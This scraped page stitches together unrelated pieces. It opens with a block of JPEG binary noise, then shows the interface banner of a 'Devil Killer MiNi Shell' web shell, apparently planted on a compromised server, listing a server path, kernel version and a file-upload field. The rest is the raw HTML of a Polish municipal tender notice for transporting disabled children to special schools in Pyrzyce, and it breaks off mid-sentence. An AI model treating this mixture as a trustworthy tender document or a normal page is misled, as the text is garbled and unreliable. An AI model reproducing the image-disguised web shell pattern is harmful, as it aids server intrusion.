JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231207/0053827901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz dzieci, uczniów i wychowanków w tym niepełnosprawnych z miejsca zamieszkania znajdującego się na terenie Gminy Pyrzyce </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Pyrzyce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 811685711</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Ratuszowy 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pyrzyce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">74-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL427 - Szczecinecko-pyrzycki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">091/ 39 70 310</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">091/39 70 314</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@pyrzyce.um.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pyrzyce.um.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz dzieci, uczniów i wychowanków w tym niepełnosprawnych z miejsca zamieszkania znajdującego się na terenie Gminy Pyrzyce </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6731ebcc-94f4-11ee-9ee7-e2087ac16d09</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00538279</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00039509/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Dowóz dzieci, uczniów i wychowanków w tym niepełnosprawnych z miejsca zamieszkania znajdującego się na terenie Gminy Pyrzyce w roku szkolnym 2023/2024</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/um_pyrzyce <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/um_pyrzyce</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym a<br/>Wykonawcami, w szczególności składanie zapytań,<br/>oświadczeń, wniosków, zawiadomień, jak również przekazywanie informacji odbywa się przy użyciu<br/>Platformy Zakupowej, dostępnej pod adresem https://platformazakupowa.pl/pn/smigiel.2. Wymagania<br/>techniczne i organizacyjne sporządzania, wysyłania i odbierania korespondencji elektronicznej opisane<br/>zostały w:1) „Regulaminie Internetowej Platformy zakupowej platformazakupowa.pl Open Nexus Sp. z<br/>o. o.” dostępnym pod adresem https://platformazakupowa.pl/strona/1-regulamin oraz 2) „Instrukcji dla<br/>wykonawców” dostępnej pod adresem https://platformazakupowa.pl/strona/45-instrukcje.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z dnia 4 maja 2016 r., str. 1), dalej „RODO”, informuję, że:<br/>1) administratorem Pani/Pana danych osobowych jest Urząd Miejski w Pyrzycach, Plac Ratuszowy 1, 74-200 Pyrzyce;<br/>2) Inspektor ochrony danych urzęduje w Urzędzie Miejskim w Pyrzycach , Plac Ratuszowy 1, 74-200 Pyrzyce, tel. 91 39 70 317, email:<br/>iod@pyrzyce.um.gov.pl od poniedziałku – piątku w godzinach od 7:00-15:00;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego na „Dowóz dzieci, uczniów i wychowanków w tym niepełnosprawnych z miejsca zamieszkania<br/>znajdującego się na terenie Gminy Pyrzyce do Niepublicznego Przedszkola Specjalnego „Puchatek” w Pyrzycach, Ośrodka<br/>Rehabilitacyjno- Edukacyjno- Wychowawczego oraz Niepublicznej Szkoły Przysposabiającej do Pracy w Nowielinie, Specjalnego<br/>Ośrodka Szkolno–Wychowawczego im. Jana Brzechwy w Pyrzycach, Zespołu Szkół Specjalnych im. J. Tuwima w Stargardzie,<br/>Specjalnego Ośrodka Szkolno- Wychowawczego im. Janusza Korczaka w Policach, w roku szkolnym 2023/2024 oraz 2024/2025 i<br/>odwożeniu trasą powrotną po zakończeniu nauki szkolnej”.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 74 Ustawy PZP,<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Ustawy PZP, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach Ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z Ustawy;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO;<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">EKSiZ.271.2.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zamówienie obejmuje:<br/>„Dowóz dzieci, uczniów i wychowanków w tym niepełnosprawnych z miejsca zamieszkania znajdującego się na terenie<br/>Gminy Pyrzyce do Niepublicznego Przedszkola Specjalnego „Puchatek” w Pyrzycach, Ośrodka Rehabilitacyjno -<br/>Edukacyjno- Wychowawczego oraz Niepublicznej Szkoły Przysposabiającej do Pracy w Nowielinie, Specjalnego Ośrodka<br/>Szkolno–Wychowawczego im. Jana Brzechwy w Pyrzycach, Zespołu Szkół Specjalnych im. J. Tuwima w Stargardzie,<br/>Specjalnego Ośrodka Szkolno- Wychowawczego im. Janusza Korczaka w Policach, od 2 stycznia 2024 r. do 31 grudnia<br/>2024 r. i odwożeniu trasą powrotną po zakończeniu nauki szkolnej”.<br/>2. Przedmiotem zamówienia jest realizacja dowozu i odwozu dzieci niepełnosprawnych z miejsca zamieszkania<br/>znajdującego się na terenie Gminy Pyrzyce do Niepublicznego Przedszkola Specjalnego „Puchatek” w Pyrzycach, Ośrodka<br/>Rehabilitacyjno- Edukacyjno-Wychowawczego oraz Niepublicznej Szkoły Przysposabiającej do Pracy w Nowielinie,<br/>Specjalnego Ośrodka Szkolno–Wychowawczego im. Jana Brzechwy w Pyrzycach, Zespołu Szkół Specjalnych im. J.<br/>Tuwima w Stargardzie, Specjalnego Ośrodka Szkolno - Wychowawczego im. Janusza Korczaka w Policach, – zwanych<br/>dalej w treści SWZ „szkołą”, w których realizują lub realizować będą obowiązek szkolny lub nauki od 2 stycznia 2024 r. do<br/>31 grudnia 2024 r. Świadczenie usług odbywać się będzie samochodami specjalistycznymi dostosowanymi do przewozu<br/>osób niepełnosprawnych wraz zapewnieniem im stosownej do charakteru niepełnosprawności opieki w czasie dowożenia,<br/>pomocy podczas wsiadania i wysiadania z miejsca zamieszkania na terenie Gminy Pyrzyce i odwożeniu trasą powrotną po<br/>zakończeniu nauki szkolnej.<br/>3. Zamawiający informuje o szacunkowej liczbie uczniów dowożonych do poszczególnych szkół:<br/>1) Niepubliczne Przedszkole Specjalne „Puchatek” w Pyrzycach, ul. Poznańska 1:<br/>a) Letnin – 1 uczeń<br/>b) Brzezin- 1 uczeń<br/>c) Krzemlin – 2 uczniów<br/>d) Ryszewko – 1 uczneń<br/>e) Nowielin- 1 uczeń<br/>f) Mechowo -1 uczeń<br/>g) Pstrowice- 1 uczeń<br/>2) Ośrodek Rehabilitacyjno-Edukacyjno-Wychowawczy i Niepubliczna Szkoła Przysposabiająca do Pracy, Nowielin 40:<br/>a) Pyrzyce ul. Plac Ratuszowy – 7 uczniów<br/>b) Brzesko – 1 uczeń<br/>c) Żabów – 2 uczniów<br/>d) Pstrowice – 1 uczeń<br/>e) Stróżewo – 1 uczeń<br/>3) Specjalny Ośrodek Szkolno–Wychowawczy im. Jana Brzechwy w Pyrzycach, ul. Słowackiego 1 :<br/>a) Brzesko – 1 uczneń<br/>b) Stróżewo– 1 uczeń<br/>c) Nowielin- 2 uczniów<br/>4) Zespół Szkół Specjalnych im. J. Tuwima w Stargardzie ul. Wita Stwosza 1a/16:<br/>a) Pyrzyce ul. Bankowa – 1 uczeń<br/>b) Pyrzyce ul. Krótka – 1 uczeń<br/>c) Pyrzyce ul. Dworcowa – 1 uczeń<br/>5) Specjalny Ośrodek Szkolno - Wychowawczy ul. Janusza Korczaka w Policach:<br/>a) Pyrzyce ul. I Maja – 1 uczeń<br/>b) Stróżewo- 1 uczeń<br/>5. W ciągu jednego dnia realizacji usługi przewidzianych jest do dowiezienia 29 uczniów niepełnosprawnych. Liczba dzieci<br/>niepełnosprawnych może ulec zmianie.<br/>6. Szacunkowy dzienny przewóz uczniów z domu do szkoły i ze szkoły do domu (łącznie rano i po południu) wynosić będzie:<br/>ok. 450 kilometrów.<br/>7. Przed złożeniem oferty wymaga się od Wykonawcy zapoznania się z istniejącymi obecnie trasami przewozu, warunkami<br/>panującymi na nich, a w szczególności: kilometrami przewozu, szerokością dróg, siecią przystanków, lokalizacją miejsc<br/>nawrotu oraz wszystkich innych czynników mających wpływ na realizację przedmiotu zamówienia.<br/>8. Podana ilość kilometrów jest ilością szacunkową służącą do prawidłowego opracowania oferty. Liczba kilometrów może<br/>ulec zmianie o: -15% - +15% kilometrów dziennych w ciągu trwania umowy, o czym Zamawiający zawiadomi Wykonawcę<br/>9. Zamówienie obejmuje dowóz dzieci niepełnosprawnych z miejsca zamieszkania do szkoły<br/>i przywóz po zajęciach lekcyjnych do miejsca zamieszkania, na trasie: dom – szkoła – dom. Dowóz dzieci<br/>niepełnosprawnych odbywać się będzie w dni nauki szkolnej tj. od 02.01.2024 r. do 31.12.2024 r. zgodnie z kalendarzem<br/>roku szkolnego 2023/2024 oraz 2024/2025 codziennie<br/>z wyjątkiem dni ustawowo wolnych od zajęć, w szczególności ferii, wakacji i dni świątecznych.<br/>10. Przewóz realizowany będzie według planowanych tras przejazdu, godzin oraz ilości dzieci wykazanych w SWZ.<br/>11. Szczegółowe godziny dowożenia do szkół i odwożenia do miejsca zamieszkania, Wykonawca ustali z rodzicami<br/>(opiekunami prawnymi) w oparciu o tygodniowy plan zajęć szkolnych dowożonych uczniów i przedstawi na piśmie<br/>Zamawiającemu w terminie na co najmniej 7 dni przed przystąpieniem do realizacji usługi. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-02 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>1. Cena- 70% (0,70),<br/>2. Liczba bezpłatnych kilometrów (nie mniej niż 1000km na przewozy ) -30% (0,30)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Liczba bezpłatnych kilometrów (nie mniej niż 1000km na przewozy )</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą wziąć udział wyłącznie Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają warunki<br/>udziału w postępowaniu dotyczące:<br/>1.1. kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej określonych w SWZ, oraz takich które<br/>wynikają z odrębnych przepisów;<br/>Warunek będzie spełniony jeżeli Wykonawca dysponuje ważną licencją lub obowiązującym zezwoleniem na wykonywanie<br/>krajowego transportu drogowego osób zgodnie z art. 7 ustawy<br/>z dnia 6 września 2001 roku o transporcie drogowym (t.j. Dz. U. z 2022 r., poz.2201, z późn. zm.). Przy ocenie spełnienia<br/>tego warunku udziału przez Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia, posiadanie uprawnień, o których mowa powyżej, jest wymagane od każdego z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia w takim zakresie,<br/>w jakim będą oni wykonywać usługę.<br/>1.2. zdolności techniczne lub zawodowe;<br/>W celu potwierdzenia spełnienia tego warunku Wykonawca wykaże, że:<br/>1) Wykonawca posiada wiedzę i doświadczenie, tj. w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 1 usługę dowozu dzieci do szkół przez<br/>okres co najmniej 1 roku szkolnego, o wartości rocznej nie mniejszej niż 20.000,00 zł (wg załącznika nr 6 do SWZ);<br/>2) Wykonawca dysponuje odpowiednim potencjałem technicznym tj. Wykonawca posiada minimum 2 pojazdy w tym 1<br/>przystosowany do przewozu osób niepełnosprawnych dostosowanych do przewozu osób na wózku inwalidzkim,<br/>wyposażonych w windę-podnośnik, pasy mocujące wózek oraz pasy mocujące dziecko na wózku inwalidzkim, wraz z<br/>zapewnieniem im dodatkowej stosownej do charakteru niepełnosprawności opieki w czasie dowożenia oraz pomocy<br/>podczas wsiadania i wysiadania.<br/>3) Wykonawca dysponuje odpowiednim potencjałem osobowym tj. co najmniej dwoma osobami posiadającymi ważne<br/>uprawnienia i badania lekarskie niezbędne do kierowania środkami transportu przeznaczonymi do przewozu osób (wg<br/>załącznika nr 8 do SWZ);<br/>1.3. sytuacji ekonomicznej lub finansowej zapewniającej wykonanie zamówienia;<br/>W celu potwierdzenia spełnienia tego warunku Wykonawca wykaże, że posiada odpowiednie ubezpieczenie<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na<br/>sumę gwarancyjną nie niższą niż 500 000,00 zł.<br/>2. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu,<br/>w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach<br/>technicznych lub zawodowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków<br/>prawnych. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić Zamawiającemu, że<br/>realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając<br/>zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.<br/>3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy mogą<br/>polegać na zdolnościach innych podmiotów, WYŁĄCZNIE gdy podmioty te zrealizują usługi, do realizacji których te<br/>zdolności są wymagane. 4. Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli<br/>zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy<br/>może mieć negatywny wpływ na realizację zamówienia.<br/>5. Zamawiający ocenia, czy udostępniane Wykonawcy przez inne podmioty zdolności techniczne lub zawodowe, pozwalają<br/>na wykazanie przez Wykonawcę spełniania warunków udziału<br/>w postępowaniu oraz bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia,<br/>o których mowa w art. 108 ust. 1 pkt 1–6 i ust. 2 Ustawy PZP.<br/>6. Jeżeli zdolności techniczne lub zawodowe podmiotu udostępniającego potencjał, nie potwierdzają spełnienia przez<br/>Wykonawcę warunków udziału w postępowaniu, lub zachodzą wobec tych podmiotów podstawy wykluczenia, Zamawiający<br/>żąda, aby Wykonawca w terminie określonym przez Zamawiającego:<br/>1) zastąpił ten podmiot innym podmiotem lub podmiotami bądź<br/>2) zobowiązał się do osobistego wykonania odpowiedniej części zamówienia, jeżeli wykaże zdolności techniczne lub<br/>zawodowe lub sytuację finansową lub ekonomiczną. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający w niniejszym<br/>postępowaniu wymaga, aby wykonawcy wykazując brak 